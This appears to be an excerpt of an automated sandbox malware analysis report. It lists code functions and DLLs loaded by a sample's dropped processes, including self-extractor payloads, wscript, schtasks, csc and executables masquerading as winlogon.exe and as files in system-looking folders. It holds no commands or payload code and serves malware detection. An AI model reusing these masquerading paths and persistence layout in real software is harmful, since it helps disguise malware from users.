Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BACC425 43_2_00007FFD9BACC425
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BACC350 43_2_00007FFD9BACC350
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BAC8E70 43_2_00007FFD9BAC8E70
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BAC1222 43_2_00007FFD9BAC1222
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BAC8E7F 43_2_00007FFD9BAC8E7F
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BAD48EE 43_2_00007FFD9BAD48EE
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\BudDliLc.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: String function: 0032FFD0 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: String function: 0032FEFC appears 42 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: String function: 003307A0 appears 31 times
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: String function: 00A3FFD0 appears 56 times
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: String function: 00A407A0 appears 31 times
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: String function: 00A3FEFC appears 42 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: String function: 0073EB78 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: String function: 0073F5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: String function: 0073EC50 appears 56 times
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: version.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: kernel.appcore.dll
